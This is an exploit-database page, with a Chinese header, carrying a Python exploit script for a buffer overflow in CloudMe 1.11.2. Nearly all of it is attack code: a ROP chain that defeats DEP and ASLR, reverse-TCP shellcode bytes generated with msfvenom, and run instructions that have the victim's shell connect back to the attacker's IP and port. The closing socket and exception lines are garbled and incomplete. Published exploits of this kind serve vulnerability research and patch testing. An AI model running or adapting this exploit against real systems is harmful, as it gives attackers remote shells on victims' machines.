CloudMe 1.11.2 – Buffer Overflow (SEH,DEP,ASLR)

  • 作者: Xenofon Vassilakopoulos
    日期: 2020-05-21
  • 类别:
  • 来源:
  • # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (SEH,DEP,ASLR)
    # Date: 2020-05-20
    # Exploit Author: Xenofon Vassilakopoulos
    # Vendor Homepage:
    # Software Link:
    # Version: CloudMe 1.11.2
    # Tested on: Windows 7 Professional x86 SP1
    # Steps to reproduce:
    # 1. On your local machine start the CloudMe service.
    # 2. change the reverse tcp shellcode using the IP and Port of your host using the following command
    # msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0d\x0a" -f python
    # 3. Run the python script.
    import struct
    import socket
    target = ""
    # Get kernel32 address from the stack
    # 0022ff8c77883c45 kernel32!BaseThreadInitThunk+0xe
    rop = struct.pack('L',0x699012c9) # POP EBP # RETN [Qt5Network.dll]
    rop+= struct.pack('L',0x0385FF88) # Offset
    rop+= struct.pack('L',0x68a9559e) # XCHG EAX,EBP # RETN [Qt5Core.dll]
    rop+= struct.pack('L',0x68ae4fe3) # POP ECX # RETN [Qt5Core.dll]
    rop+= struct.pack('L',0x0362fffc) # Offset
    rop+= struct.pack('L',0x68ad422b) # SUB EAX,ECX # RETN [Qt5Core.dll]
    rop+= struct.pack('L',0x68ae8a22) # MOV EAX,DWORD PTR [EAX] # RETN [Qt5Core.dll]
    # Calculate VirtualProtect relative to the leaked kernel32 address
    rop+= struct.pack('L',0x68a812c9) # POP EBP # RETN [Qt5Core.dll]
    rop+= struct.pack('L',0xfffae493) # Offset
    rop+= struct.pack('L',0x61ba8137) # ADD EAX,EBP # RETN [Qt5Gui.dll]
    # Setup VirtualProtect
    # edi
    rop+= struct.pack('L',0x6d9c23ab) # POP EDI # RETN [Qt5Sql.dll]
    rop+= struct.pack('L',0x6d9c1011) # RETN (ROP NOP) [Qt5Sql.dll]
    # esi
    rop+= struct.pack('L',0x61b63b3c) # XCHG EAX, ESI # RETN # ptr to virtualprotect
    # edx
    rop+= struct.pack('L',0x68d327ff) # POP EAX # POP ECX # RETN [Qt5Core.dll]
    rop+= struct.pack('L',0xffffffc0) # Value to negate, will become 0x00000040
    rop+= struct.pack('L',0x41414141) # Filler
    rop+= struct.pack('L',0x68cef5b2) # NEG EAX # RETN [Qt5Core.dll]
    rop+= struct.pack('L',0x68b1df17) # XCHG EAX,EDX # RETN [Qt5Core.dll]
    # ebx
    rop+= struct.pack('L',0x68ae7ee3) # POP EAX # RETN [Qt5Core.dll]
    rop+= struct.pack('L',0xfffffdff) # Value to negate, will become 0x00000201
    rop+= struct.pack('L',0x6d9e431a) # NEG EAX # RETN [Qt5Sql.dll]
    rop+= struct.pack('L',0x68aad07c) # XCHG EAX,EBX # RETN [Qt5Core.dll]
    # ebp
    rop+= struct.pack('L',0x6d9c12c9) # POP EBP # RETN [Qt5Sql.dll]
    rop+= struct.pack('L',0x6d9c12c9) # skip 4 bytes 
    # eax & ecx
    rop+= struct.pack('L',0x6fe4dc57) # POP EAX # POP ECX # RETN [libstdc++-6.dll]
    rop+= struct.pack('L',0x90909090) # NOP
    rop+= struct.pack('L',0x68ee6b16) # &Writable location [Qt5Core.dll]
    # push registers to stack
    rop+= struct.pack('L',0x68ef1b07) # PUSHAD # RETN [Qt5Core.dll]
    rop+= struct.pack('L',0x64b4d6cd) # JMP ESP [libwinpthread-1.dll]
    #msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
    buf =b""
    buf += b"\xbf\xa4\x90\x9d\x67\xd9\xc7\xd9\x74\x24\xf4\x5a\x31"
    buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xde\x9e\x7f"
    buf += b"\x92\xe2\x77\xfd\x5d\x1a\x88\x62\xd7\xff\xb9\xa2\x83"
    buf += b"\x74\xe9\x12\xc7\xd8\x06\xd8\x85\xc8\x9d\xac\x01\xff"
    buf += b"\x16\x1a\x74\xce\xa7\x37\x44\x51\x24\x4a\x99\xb1\x15"
    buf += b"\x85\xec\xb0\x52\xf8\x1d\xe0\x0b\x76\xb3\x14\x3f\xc2"
    buf += b"\x08\x9f\x73\xc2\x08\x7c\xc3\xe5\x39\xd3\x5f\xbc\x99"
    buf += b"\xd2\x8c\xb4\x93\xcc\xd1\xf1\x6a\x67\x21\x8d\x6c\xa1"
    buf += b"\x7b\x6e\xc2\x8c\xb3\x9d\x1a\xc9\x74\x7e\x69\x23\x87"
    buf += b"\x03\x6a\xf0\xf5\xdf\xff\xe2\x5e\xab\x58\xce\x5f\x78"
    buf += b"\x3e\x85\x6c\x35\x34\xc1\x70\xc8\x99\x7a\x8c\x41\x1c"
    buf += b"\xac\x04\x11\x3b\x68\x4c\xc1\x22\x29\x28\xa4\x5b\x29"
    buf += b"\x93\x19\xfe\x22\x3e\x4d\x73\x69\x57\xa2\xbe\x91\xa7"
    buf += b"\xac\xc9\xe2\x95\x73\x62\x6c\x96\xfc\xac\x6b\xd9\xd6"
    buf += b"\x09\xe3\x24\xd9\x69\x2a\xe3\x8d\x39\x44\xc2\xad\xd1"
    buf += b"\x94\xeb\x7b\x75\xc4\x43\xd4\x36\xb4\x23\x84\xde\xde"
    buf += b"\xab\xfb\xff\xe1\x61\x94\x6a\x18\xe2\x5b\xc2\x23\xf4"
    buf += b"\x33\x11\x23\xf9\x78\x9c\xc5\x93\x6e\xc9\x5e\x0c\x16"
    buf += b"\x50\x14\xad\xd7\x4e\x51\xed\x5c\x7d\xa6\xa0\x94\x08"
    buf += b"\xb4\x55\x55\x47\xe6\xf0\x6a\x7d\x8e\x9f\xf9\x1a\x4e"
    buf += b"\xe9\xe1\xb4\x19\xbe\xd4\xcc\xcf\x52\x4e\x67\xed\xae"
    buf += b"\x16\x40\xb5\x74\xeb\x4f\x34\xf8\x57\x74\x26\xc4\x58"
    buf += b"\x30\x12\x98\x0e\xee\xcc\x5e\xf9\x40\xa6\x08\x56\x0b"
    buf += b"\x2e\xcc\x94\x8c\x28\xd1\xf0\x7a\xd4\x60\xad\x3a\xeb"
    buf += b"\x4d\x39\xcb\x94\xb3\xd9\x34\x4f\x70\xf9\xd6\x45\x8d"
    buf += b"\x92\x4e\x0c\x2c\xff\x70\xfb\x73\x06\xf3\x09\x0c\xfd"
    buf += b"\xeb\x78\x09\xb9\xab\x91\x63\xd2\x59\x95\xd0\xd3\x4b"
    junk1 = "\x41"*1604
    nops = "\x90"*16
    junk2 = "C"*(2236 - len(nops) - len(buf) - len(rop) - len(junk1))
    seh = struct.pack('L',0x6998fb2e) # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN[Qt5Network.dll] 
    payload = junk1 + rop + nops + buf + junk2 + seh 
    	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except Exception as e: